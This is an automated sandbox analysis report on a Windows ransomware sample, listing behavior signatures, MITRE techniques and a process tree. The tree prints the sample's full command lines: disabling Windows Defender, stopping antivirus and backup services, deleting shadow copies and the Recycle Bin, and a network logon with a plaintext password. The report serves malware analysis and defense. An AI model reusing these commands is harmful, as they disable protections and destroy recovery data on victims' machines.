2481bcb7380b038e84a6052a3cc42fab8e791cf1dffaefe783398a843af68c22

Analysis

max time kernel
14s
max time network
153s
platform
windows10_x64
resource
win10v20210410
submitted
28-05-2021 09:57

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe
Size

165KB
MD5

1407b521eded12eca22dc4a12421be59
SHA1

031cf6f7f62cbea5753b3d6cc7ee113f69aa43a3
SHA256

79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249
SHA512

79ed739a0ad7f9b45150f491dc9e1cd9f8d4b828fc0ff82bdc23307c4e31efefb862d163ded840438759805b3a792b3fa569d3cce13e4702987a107bc85d3406

Score

10^/10

discovery evasion ransomware trojan

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490
Downloads MZ/PE file
Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

Modifies file permissions 1 TTPs 13 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
5656	icacls.exe
4428	icacls.exe
5536	icacls.exe
5476	icacls.exe
5236	icacls.exe
4700	icacls.exe
4580	icacls.exe
1472	icacls.exe
5832	icacls.exe
5044	icacls.exe
5960	icacls.exe
4068	icacls.exe
5492	icacls.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Interacts with shadow copies 2 TTPs 14 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

pid	Process
5668	vssadmin.exe
5560	vssadmin.exe
5648	vssadmin.exe
5308	vssadmin.exe
4832	vssadmin.exe
5968	vssadmin.exe
4268	vssadmin.exe
5264	vssadmin.exe
4476	vssadmin.exe
4484	vssadmin.exe
5568	vssadmin.exe
5788	vssadmin.exe
5696	vssadmin.exe
4968	vssadmin.exe

Kills process with taskkill 64 IoCs

evasion

pid	Process
4444	taskkill.exe
5092	taskkill.exe
5960	taskkill.exe
4140	taskkill.exe
4936	taskkill.exe
4720	taskkill.exe
5316	taskkill.exe
4492	taskkill.exe
5564	taskkill.exe
4664	taskkill.exe
4684	taskkill.exe
4224	taskkill.exe
1008	taskkill.exe
5788	taskkill.exe
5444	taskkill.exe
5184	taskkill.exe
4972	taskkill.exe
1380	taskkill.exe
1572	taskkill.exe
5004	taskkill.exe
2568	taskkill.exe
4884	taskkill.exe
4136	taskkill.exe
5812	taskkill.exe
1092	taskkill.exe
2508	taskkill.exe
5248	taskkill.exe
5808	taskkill.exe
4736	taskkill.exe
5164	taskkill.exe
3464	taskkill.exe
5148	taskkill.exe
5028	taskkill.exe
4144	taskkill.exe
2084	taskkill.exe
5896	taskkill.exe
4572	taskkill.exe
4356	taskkill.exe
2456	taskkill.exe
5720	taskkill.exe
5592	taskkill.exe
4176	taskkill.exe
5476	taskkill.exe
6072	taskkill.exe
2024	taskkill.exe
4572	taskkill.exe
5584	taskkill.exe
4524	taskkill.exe
4824	taskkill.exe
4212	taskkill.exe
4392	taskkill.exe
2888	taskkill.exe
4452	taskkill.exe
5176	taskkill.exe
4416	taskkill.exe
4992	taskkill.exe
5400	taskkill.exe
6008	taskkill.exe
5580	taskkill.exe
6124	taskkill.exe
4876	taskkill.exe
2636	taskkill.exe
5784	taskkill.exe
4808	taskkill.exe

Modifies registry key 1 TTPs 2 IoCs

Modify Registry

T1112

pid	Process
2184	reg.exe
3108	reg.exe

Runs net.exe

Runs ping.exe 1 TTPs 4 IoCs

Remote System Discovery

T1018

pid	Process
6060	PING.EXE
4180	PING.EXE
1376	PING.EXE
5628	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe
3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe
3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe
3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe
3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe
3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe
3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe
3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe
3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe
3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe
3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe
3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe
3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe
3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe
3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe
3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe
3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe
3292	powershell.exe
3292	powershell.exe
3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe
3292	powershell.exe
3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe
3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe
3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe
3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe
3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe
3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe
3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe
3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe
3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe
3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe
3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe
3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe
3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe
3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe
3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe
3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe
3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe
3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe
3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe
3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe
3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe
3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe
3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe
3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe
3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe
3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe
3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe
3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe
3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe
3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe
3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe
3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe
3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe
3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe
3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe
3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe
3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe
3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe
3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe
3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe
3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe
3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe
3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe

Suspicious use of AdjustPrivilegeToken 35 IoCs

description	pid	Process
Token: SeDebugPrivilege	3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe
Token: SeDebugPrivilege	3292	powershell.exe
Token: SeIncreaseQuotaPrivilege	3292	powershell.exe
Token: SeSecurityPrivilege	3292	powershell.exe
Token: SeTakeOwnershipPrivilege	3292	powershell.exe
Token: SeLoadDriverPrivilege	3292	powershell.exe
Token: SeSystemProfilePrivilege	3292	powershell.exe
Token: SeSystemtimePrivilege	3292	powershell.exe
Token: SeProfSingleProcessPrivilege	3292	powershell.exe
Token: SeIncBasePriorityPrivilege	3292	powershell.exe
Token: SeCreatePagefilePrivilege	3292	powershell.exe
Token: SeBackupPrivilege	3292	powershell.exe
Token: SeRestorePrivilege	3292	powershell.exe
Token: SeShutdownPrivilege	3292	powershell.exe
Token: SeDebugPrivilege	3292	powershell.exe
Token: SeSystemEnvironmentPrivilege	3292	powershell.exe
Token: SeRemoteShutdownPrivilege	3292	powershell.exe
Token: SeUndockPrivilege	3292	powershell.exe
Token: SeManageVolumePrivilege	3292	powershell.exe
Token: 33	3292	powershell.exe
Token: 34	3292	powershell.exe
Token: 35	3292	powershell.exe
Token: 36	3292	powershell.exe
Token: SeDebugPrivilege	636	powershell.exe
Token: SeDebugPrivilege	3244	powershell.exe
Token: SeDebugPrivilege	2172	powershell.exe
Token: SeDebugPrivilege	2868	powershell.exe
Token: SeDebugPrivilege	64	powershell.exe
Token: SeDebugPrivilege	376	arp.exe
Token: SeDebugPrivilege	3960	powershell.exe
Token: SeDebugPrivilege	4180	PING.EXE
Token: SeDebugPrivilege	4296	Process not Found
Token: SeDebugPrivilege	4440	Process not Found
Token: SeDebugPrivilege	4684	taskkill.exe
Token: SeDebugPrivilege	4552	taskkill.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3560 wrote to memory of 3292	3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe	74
PID 3560 wrote to memory of 3292	3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe	74
PID 3560 wrote to memory of 636	3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe	78
PID 3560 wrote to memory of 636	3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe	78
PID 3560 wrote to memory of 3244	3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe	79
PID 3560 wrote to memory of 3244	3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe	79
PID 3560 wrote to memory of 2172	3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe	81
PID 3560 wrote to memory of 2172	3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe	81
PID 3560 wrote to memory of 2868	3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe	84
PID 3560 wrote to memory of 2868	3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe	84
PID 3560 wrote to memory of 3960	3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe	86
PID 3560 wrote to memory of 3960	3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe	86
PID 3560 wrote to memory of 64	3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe	88
PID 3560 wrote to memory of 64	3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe	88
PID 3560 wrote to memory of 376	3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe	90
PID 3560 wrote to memory of 376	3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe	90
PID 3560 wrote to memory of 4180	3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe	92
PID 3560 wrote to memory of 4180	3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe	92
PID 3560 wrote to memory of 4296	3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe	94
PID 3560 wrote to memory of 4296	3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe	94
PID 3560 wrote to memory of 4440	3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe	96
PID 3560 wrote to memory of 4440	3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe	96
PID 3560 wrote to memory of 4552	3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe	465
PID 3560 wrote to memory of 4552	3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe	465
PID 3560 wrote to memory of 4684	3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe	466
PID 3560 wrote to memory of 4684	3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe	466
PID 3560 wrote to memory of 4752	3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe	591
PID 3560 wrote to memory of 4752	3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe	591
PID 3560 wrote to memory of 4772	3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe	177
PID 3560 wrote to memory of 4772	3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe	177
PID 3560 wrote to memory of 4804	3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe	627
PID 3560 wrote to memory of 4804	3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe	627
PID 3560 wrote to memory of 4864	3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe	105
PID 3560 wrote to memory of 4864	3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe	105
PID 3560 wrote to memory of 4928	3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe	106
PID 3560 wrote to memory of 4928	3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe	106
PID 3560 wrote to memory of 4980	3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe	354
PID 3560 wrote to memory of 4980	3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe	354
PID 3560 wrote to memory of 5052	3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe	108
PID 3560 wrote to memory of 5052	3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe	108
PID 3560 wrote to memory of 996	3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe	401
PID 3560 wrote to memory of 996	3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe	401
PID 3560 wrote to memory of 1456	3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe	110
PID 3560 wrote to memory of 1456	3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe	110
PID 3560 wrote to memory of 4220	3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe	253
PID 3560 wrote to memory of 4220	3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe	253
PID 3560 wrote to memory of 4448	3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe	252
PID 3560 wrote to memory of 4448	3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe	252
PID 3560 wrote to memory of 4692	3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe	112
PID 3560 wrote to memory of 4692	3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe	112
PID 3560 wrote to memory of 4600	3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe	248
PID 3560 wrote to memory of 4600	3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe	248
PID 4772 wrote to memory of 1460	4772	net1.exe	247
PID 4772 wrote to memory of 1460	4772	net1.exe	247
PID 4752 wrote to memory of 2768	4752	Conhost.exe	419
PID 4752 wrote to memory of 2768	4752	Conhost.exe	419
PID 4804 wrote to memory of 4000	4804	Conhost.exe	343
PID 4804 wrote to memory of 4000	4804	Conhost.exe	343
PID 3560 wrote to memory of 4004	3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe	510
PID 3560 wrote to memory of 4004	3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe	510
PID 3560 wrote to memory of 5124	3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe	243
PID 3560 wrote to memory of 5124	3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe	243
PID 4864 wrote to memory of 5160	4864	net.exe	242
PID 4864 wrote to memory of 5160	4864	net.exe	242

C:\Users\Admin\AppData\Local\Temp\79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe
"C:\Users\Admin\AppData\Local\Temp\79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3560
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" Get-MpPreference -verbose
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3292
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:636
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3244
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2172
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2868
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3960
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:64
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6
  2⤵
  PID:376
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0
  2⤵
  PID:4180
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6
  2⤵
  PID:4296
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6
  2⤵
  PID:4440
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true
  2⤵
  PID:4552
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2
  2⤵
  PID:4684
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop avpsus /y
  2⤵
  PID:4752
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop avpsus /y
    3⤵
    PID:2768
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop McAfeeDLPAgentService /y
  2⤵
  PID:4772
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop mfewc /y
  2⤵
  PID:4804
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop mfewc /y
    3⤵
    PID:4000
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BMR Boot Service /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4864
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BMR Boot Service /y
    3⤵
    PID:5160
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop NetBackup BMR MTFTP Service /y
  2⤵
  PID:4928
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y
    3⤵
    PID:5172
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop ccEvtMgr /y
  2⤵
  PID:5052
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ccEvtMgr /y
    3⤵
    PID:5432
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop ccSetMgr /y
  2⤵
  PID:996
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ccSetMgr /y
    3⤵
    PID:5628
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop BackupExecManagementService /y
      4⤵
      PID:5196
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SavRoam /y
  2⤵
  PID:1456
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SavRoam /y
    3⤵
    PID:5444
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop QBIDPService /y
  2⤵
  PID:4692
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop QBIDPService /y
    3⤵
    PID:5684
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop QBCFMonitorService /y
  2⤵
  PID:4004
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop QBCFMonitorService /y
    3⤵
    PID:5776
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop stc_raw_agent /y
  2⤵
  PID:5328
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop stc_raw_agent /y
    3⤵
    PID:5480
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VSNAPVSS /y
  2⤵
  PID:5408
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VSNAPVSS /y
    3⤵
    PID:5188
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamTransportSvc /y
  2⤵
  PID:5504
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamTransportSvc /y
    3⤵
    PID:5288
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecVSSProvider /y
  2⤵
  PID:5824
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecVSSProvider /y
    3⤵
    PID:5972
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5172
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecAgentBrowser /y
  2⤵
  PID:6012
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
    3⤵
    PID:5984
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecDiveciMediaService /y
  2⤵
  PID:6072
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecDiveciMediaService /y
    3⤵
    PID:5160
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecAgentAccelerator /y
  2⤵
  PID:5916
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop PDVFSService /y
  2⤵
  PID:5748
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop veeam /y
  2⤵
  PID:5672
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamNFSSvc /y
  2⤵
  PID:5616
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamDeploymentService /y
  2⤵
  PID:5544
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop zhudongfangyu /y
  2⤵
  PID:5276
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop AcrSch2Svc /y
  2⤵
  PID:5324
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop AcrSch2Svc /y
    3⤵
    PID:5804
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin
  2⤵
  PID:5200
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.24 /USER:SHJPOLICE\amer !Omar2012
  2⤵
  PID:5548
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" Delete Shadows /all /quiet
  2⤵
  - Interacts with shadow copies
  PID:5668
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=unbounded
  2⤵
  - Interacts with shadow copies
  PID:5788
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:5968
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=unbounded
  2⤵
  - Interacts with shadow copies
  PID:5560
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:5648
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=unbounded
  2⤵
  - Interacts with shadow copies
  PID:5308
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:4476
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=unbounded
  2⤵
  - Interacts with shadow copies
  PID:4268
- C:\Windows\SYSTEM32\vssadmin.exe
